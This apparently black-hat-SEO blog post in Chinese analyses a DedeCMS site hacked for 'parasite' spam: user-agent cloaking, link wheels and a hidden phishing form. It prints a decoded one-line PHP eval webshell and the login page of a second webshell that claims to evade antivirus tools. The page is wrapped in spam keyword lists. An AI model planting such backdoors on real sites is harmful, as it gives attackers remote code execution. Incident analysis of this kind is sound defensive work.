久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當前位置:首頁 >> 黑帽技術 >> 寄生蟲 >> 寄生蟲排名:寄生蟲感染及代碼分析

寄生蟲排名:寄生蟲感染及代碼分析

yupang 寄生蟲 1104

當我們的網站被入侵了,該如何解決?

  一般遇到這種情況,大家先不要慌,拿出手機拍個視頻發個抖音和朋友圈啥的就好了。

  今天早上一起來,就有學員在群里發了個截圖,說他的站點被入侵了,用來搞那種詞。我們來看截圖。

  然后呢,從快照點擊進去,是進入到對應的列表首頁的。當時我看到這個,我就知道是什么原因了。然后我就要了ftp賬號,開始了快樂的分析之旅。

先從搜索結果分析

  先還原一下問題,然后我就拿著域名去site了一下,首先找到被寄生的頁面,發現還不少,而且是從今年的6月初就已經有了。

  然后點擊進去,發現真的是跳到了列表的首頁。根據老司機的經驗,出現這種原因的就只有兩種技術可以實現。

  1.js判斷useragent做跳轉

  2.php判斷useragent做跳轉

  以前還有一種是如果用戶直接訪問的話是返回正常的頁面,但是如果從搜索引擎點擊進去是返回被修改的頁面的。那個跟現在的原理相同,但是做法不一樣。目前這個是為了讓用戶更加的難發現問題在哪,對于小白可能就一臉懵逼了。

  那么確定問題所在之后,我們就開始分析。既然正常的用戶訪問不了,那么我們就模擬一下搜索引擎蜘蛛好了。

開始祭出大殺器

  作為seoer,怎么能沒有一款隨意切換瀏覽器UA的插件呢,這里我用的是,這個。

  但是這個插件默認是沒有搜索引擎ua的,得自己手動添加。這里我就不啰嗦了。

  通過UA插件切換了瀏覽器的UA,然后再次訪問,終于正常了。然后就是分析網頁源代碼。(其實也可以直接查看百度快照的源代碼的,我這么做主要就是為了裝b)

  好家伙,一點都不知道那個啥。而且這個明顯是程序自動生成的頁面,跟原本正常頁面的header是不一樣的。

  這個是正常內頁的頭部。明顯的,黑帽的還用的是HTML5,而正常的頁面還是用XHTML(HTML4.0過渡)。黑帽還是跟進新時代的,用最新的技術。

  然后瀏覽了一通源代碼,并沒有發現異常的js內容和文件。所以可以確定問題就是在php里面做的手腳了。

  但是在看源碼的時候,倒是發現了一些新的東西,這個也是寄生蟲的特征吧。

  這里有一個隱藏的區塊,大概看了下是個表單,估計是用來做釣魚用的,竊取用戶信息。但是由于對應的css樣式沒有引用,所以就看不到真實的樣子。

  然后我們也看到,所有的鏈接都變成了這種程序生成的頁面鏈接,對于寄生蟲病毒,一般會做成鏈輪的方式。而且頁面也會越來越多的。

  我們也可以看到,有連接到站外去的鏈接,形成一個大的鏈輪。

  內容方面我就不說了,這種類型的內容都是套用模板來批量生成的。

  我們再來看一個很有意思的吧,這個在之前的黑帽文章里面也講到過。就是我們經常搜索一些灰色詞的時候,會看到有一些著名站點的結果在里面。那么之前的猜測是通過錨文本+301跳轉來做的。但是我發現我想多了,它就是單純的外鏈錨文本而已,類似于著名的“谷歌炸彈”。

 

  HTML源碼的分析就到這里,從中我們也能學到很多東西。我們接下來分析php,一般存在這種問題的原因就是網站存在文件上傳漏洞,而且該童鞋的站點是dedecms的,那么這個就更加明顯了。

  還有一個原因確定是PHP造成的,就是在源碼里面可以看到有PHP的報錯信息。因此很明顯就是黑客的php跟原來的沖突了才導致的。

  一般的,對于文件上傳漏洞主要就是在圖文上傳目錄,和模板目錄。于是我就要來了ftp賬號,開始高高興興的分析之旅……

PHP分析

  一般的,想要知道黑客的PHP文件上傳到哪里,可以直接通過查看文件夾和文件的最新更新時間。

  不過由于該站點的文件夾太多了,我還沒得找出來,該童鞋就用D盾一頓掃就找到了,結果我不知道,還在傻乎乎的找沒找到。原來是他刪除了。

  不過我也要到了黑客的PHP文件,等下我們分析一下源碼。黑客的文件上傳路徑如我所料,一個是在plus/img目錄一個是在templates模板目錄。

  來看看這幾個文件。

  首先,入口文件st.php是放在plus/img目錄下的,這個猜測應該是個小馬文件,用來方便上傳后面的大馬。我們看下源碼:

  一臉懵逼,看不懂?沒關系,我們來翻譯一下,其實黑客就喜歡搞這些看起來高大上的東西。其實無非就是簡單的加解密而已。

  然后經過一番奮斗之后,我還原了代碼。

  其實就是一段base64的加密,然后經過兩次base64解密之后就得到原來的東西了。

  解密出來,它就是一個post表單處理,它會執行post表單提交過來的代碼。

1
@eval($_POST['test']);

  所以黑客就可以通過這個表單,提交大馬過來了。然后就有了接下來的大馬文件。

  這個就是大馬文件了,其中19行的$str里面是一大長串的加密字符,我就不截圖了。反正很長就是了。然后我們解密一下看看后來長啥樣。

<title>請勿使用非法用途</title>
<meta http-equiv="content-type" content="text/html;charset=gb2312">
<style type="text/css">
.form-control{
display:block;
width:100%;
height:38px;
padding:8px 12px;
font-size:14px;
line-height:1.428571429;
color:#555;
vertical-align:middle;
background-color:#fff;
border:1px solid #ccc;
border-radius:4px;
-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);
box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);
-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;
transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s
}
.btn{
display:inline-block;
padding:8px 12px;
margin-bottom:0;
font-size:14px;
font-weight:500;
line-height:1.428571429;
text-align:center;
white-space:nowrap;
vertical-align:middle;
cursor:pointer;
border:1px solid transparent;
border-radius:4px;
-webkit-user-select:none;
-moz-user-select:none;
-ms-user-select:none;
-o-user-select:none;
user-select:none
}
.btn-primary{
color:#fff;
background-color:#428bca;
border-color:#428bca
}
</style>
<center>
<br><br>
<font size="3" face="Microsoft YaHei">過安全狗、云鎖、阿里云、360、護衛神、D盾、百度云、各種殺軟!</font>
<br><br>
<form method="POST">
<input style="Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%" class="form-control" placeholder="@Passwrd" type="password" name="getpwd">
<input style="Width:55pt;font-size:90%;font-family:Microsoft YaHei" class="btn btn-primary" type="submit" value="#Login"></form>
</center>
</body>
</html>

 這個就是黑客留下的,我們發現這個似乎也是一個表單提交的頁面。跟內容的生成沒有任何的關系。

  那么黑客是如何生成內容的呢?主要的就是通過前面的那個st.php,其實這兩個文件都是屬于后門,而且這第二個文件是存放在了模板下的兩個不同的目錄里面。主要就是為了當st.php文件被發現之后,可以通過這第二個文件繼續干這個站點。內容的話都是通過st.php提交來生成的。

總結

  本次的分析就到這里,可以看到黑客很多地方都是很厲害的???我們要注意防范,特別是使用開源的程序做站的時候。一定要修復好漏洞。同時賬戶密碼等一定要復雜,而且經常更換。對于一些敏感的目錄,可以通過nginx禁止瀏覽php、asp、jsp等文件。同時要配置要權限,不讓圖片文件夾等擁有可執行權限。

  其實到這里我都有點不太確定這個是否是真的寄生蟲感染,因為沒有發現生成內容的木馬文件。不過只是通過后門來生成內容還是很厲害的,估計是一個新的方式吧。還有就是由于時間關系,我并沒有問該童鞋,是否近期有大量的請求是訪問st.php的。這個后面等我驗證了再給大家答復。


協助本站SEO優化一下,謝謝!
關鍵詞不能為空

免責聲明

資料匯總于網絡,如有侵權 聯系站長刪除 http://m.790079.com

同類推薦

發表評論

訪客

◎歡迎參與討論,請在這里發表您的看法和觀點。
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
精品无人区一区二区三区竹菊| 国产精品一区二区电影| 国产精品视频网站在线观看| 99精彩视频在线观看免费| 美女一区视频| 国精产品99永久一区一区| 欧美成人精品免费| 欧美在线观看视频| 日韩欧美黄色大片| 日韩精品久久一区二区| 色999五月色| 视频一区二区三| 亚欧洲精品在线视频免费观看| 色综合久久天天综线观看| 国产精品久久久一区| 久久精品国产一区二区三区| 久久国产精品一区二区三区四区 | 极品校花啪啪激情久久| 热re99久久精品国99热蜜月| 青青草视频国产| 狠狠爱一区二区三区| 国产日韩欧美一区二区| 国产精品一区久久| 91精品国产91久久久久青草| 国产成人一区二区在线| 日韩中文字幕久久| 国产精品久久久久不卡| 另类美女黄大片| 中文字幕人成一区| 亚洲国产高清国产精品| 一本久道综合色婷婷五月| 亚洲国产成人不卡| 日本精品免费| 国模杨依粉嫩蝴蝶150p| 国产日韩一区欧美| 91久久国产自产拍夜夜嗨 | 国产精品一区二区欧美| 99中文字幕在线观看| 国产高清在线一区| 国产成人欧美在线观看| 国产精品初高中精品久久| 一区精品在线| 日韩av电影在线网| 奇米影视亚洲狠狠色| 免费一区二区三区| 99精品国产高清在线观看| 国产成人精品a视频一区www| 国产精品丝袜久久久久久不卡 | 国产剧情久久久久久| 116极品美女午夜一级| 日韩在线观看精品| 欧美日韩国产成人| 日本一区不卡| 精品欧美一区二区三区久久久| 成人免费毛片网| 久久久精品日本| 亚洲视频电影| 欧美日韩一区二| 8050国产精品久久久久久| 国产精品久久久久久久久男| 日韩在线综合网| 国产日韩一区二区在线| 俺也去精品视频在线观看| 欧美日韩国产第一页| 欧美综合在线第二页| 91九色国产在线| 国产精品国产亚洲精品看不卡| 日本免费高清一区| 国产欧美日韩最新| 久久精品国产欧美激情| 综合一区中文字幕| 蜜桃麻豆91| 精品国产依人香蕉在线精品| 手机看片福利永久国产日韩| 国产一区二区在线免费视频| 久久久久一区二区三区| 亚洲精品一区二| 国产乱子夫妻xx黑人xyx真爽| 日韩亚洲第一页| 日日摸日日碰夜夜爽av| 成人国产精品日本在线| 精品国产乱码久久久久久久软件| 欧美日韩亚洲一二三| 7777免费精品视频| 亚洲在线观看视频网站| 国产九色porny| 久久99国产综合精品女同| 国内精品**久久毛片app| 久久精品成人动漫| 秋霞午夜一区二区| 国产成人看片| 欧美国产一区二区在线| 久久久久久美女| 日韩人妻一区二区三区蜜桃视频| 国产精品av在线播放| 国产精品欧美激情在线观看| 欧美午夜精品久久久久免费视| 久久riav| 性色av香蕉一区二区| 91精品国自产在线观看| 亚洲电影一二三区| 69久久夜色精品国产69| 亚洲黄色一区二区三区| av在线播放亚洲| 一区二区三区av| 国产精品直播网红| 欧美激情精品久久久久久黑人| 国产又黄又大又粗视频| 国产精品偷伦视频免费观看国产| 欧美黄网在线观看| 国产精品高清在线观看| 国产一区二区三区精彩视频| 欧美成aaa人片免费看| 欧美日韩在线播放一区二区| 国产精品久久久久久久久免费| 国模精品娜娜一二三区| 欧美日韩成人网| 国产精品av免费在线观看| 日韩视频一二三| 国产精品久久9| av在线免费观看国产| 熟女少妇精品一区二区| 日日狠狠久久偷偷四色综合免费| 欧美亚洲第一区| 欧美日韩国产123| 久久人人爽爽人人爽人人片av| 日本电影一区二区三区| 国产精品免费小视频| 国模吧一区二区| 中文字幕在线乱| 久久香蕉综合色| 欧美一区二区综合| 久久综合免费视频| 91精品啪aⅴ在线观看国产| 欧美一级视频一区二区| 久久激情视频久久| 成年丰满熟妇午夜免费视频| 亚洲欧洲精品一区二区三区波多野1战4| 91国在线精品国内播放| 欧美精品99久久| 伊人久久大香线蕉综合75| 国产激情在线观看视频| 美乳视频一区二区| 亚洲国产精品一区二区第一页| 久久久久久久久久久久久国产精品| 黄频视频在线观看| 亚洲国产精品久久久久久女王| 日韩亚洲欧美中文高清在线| 国产噜噜噜噜噜久久久久久久久| 欧美一级视频在线观看| 久久综合色影院| 久久久久久久久久久久久久国产 | www国产亚洲精品| 欧美最大成人综合网| 伊人精品久久久久7777| 久久久免费电影| 免费看国产一级片| 日韩 欧美 自拍| 久久久久久97| 久久精品国产亚洲精品| 97干在线视频| 国内成+人亚洲| 日韩欧美精品在线观看视频| 在线观看欧美一区| 国产精品久久久久久超碰| 国产成人短视频| www精品久久| 国产又黄又猛视频| 欧美一区免费视频| 欧美一级视频一区二区| 色综合天天狠天天透天天伊人| 久久久噜久噜久久综合| 99精品人妻少妇一区二区| 国产淫片免费看| 欧美 日韩 激情| 日本免费高清一区二区| 亚洲精品日韩精品| 一区二区三区欧美成人| 久久中文字幕视频| 国产精品久久久久久久久久久新郎| 久久精精品视频| 久久久www免费人成黑人精品 | 91国产丝袜在线放| 国产欧美一区二区三区久久人妖 | 一区二区三区的久久的视频| 国产精品吹潮在线观看| 国产精品入口夜色视频大尺度| 日韩有码在线电影| 久久av一区二区三区漫画| 91精品国产高清自在线| 99在线免费观看视频| 成人一级生活片| 国产女主播自拍| 国产综合 伊人色| 国产综合av一区二区三区| 免费看欧美黑人毛片| 激情五月开心婷婷| 精品无人区一区二区三区| 国产在线拍揄自揄视频不卡99| 国产综合av一区二区三区|